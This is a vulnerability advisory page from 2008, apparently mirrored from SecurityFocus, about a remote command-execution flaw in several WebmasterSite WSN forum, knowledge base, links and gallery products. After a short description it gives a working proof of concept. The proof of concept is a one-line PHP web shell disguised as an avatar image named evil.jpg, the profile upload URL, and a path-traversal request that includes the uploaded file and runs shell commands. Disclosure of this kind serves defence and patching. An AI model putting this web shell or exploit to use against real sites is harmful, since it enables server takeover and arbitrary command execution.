WebmasterSite (Multiple Products) - Remote Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056774 漏洞类型
发布时间 2008-08-06 更新时间 2008-08-06
漏洞平台 PHP CVSS评分 N/A
source: http://www.securityfocus.com/bid/30572/info

Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data.

Successfully exploiting this issue will allow an attacker to execute arbitrary commands in the context of the affected application.

This issue affects the following products:

WSN Forum 4.1.43
WSN Knowledge Base 4.1.36
WSN Links 4.1.44
WSN Gallery 4.1.30

Note that previous versions may also be vulnerable. 

Avatar evil.jpg source:
<? system($_GET['cmd']); ?>

Enter to upload: 
http://www.example.com/forum/profile.php?action=editprofile&id=[Your User ID]

See the avatar name at your profile.

Upload evil avatar and go to: 
http://www.example.com/index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al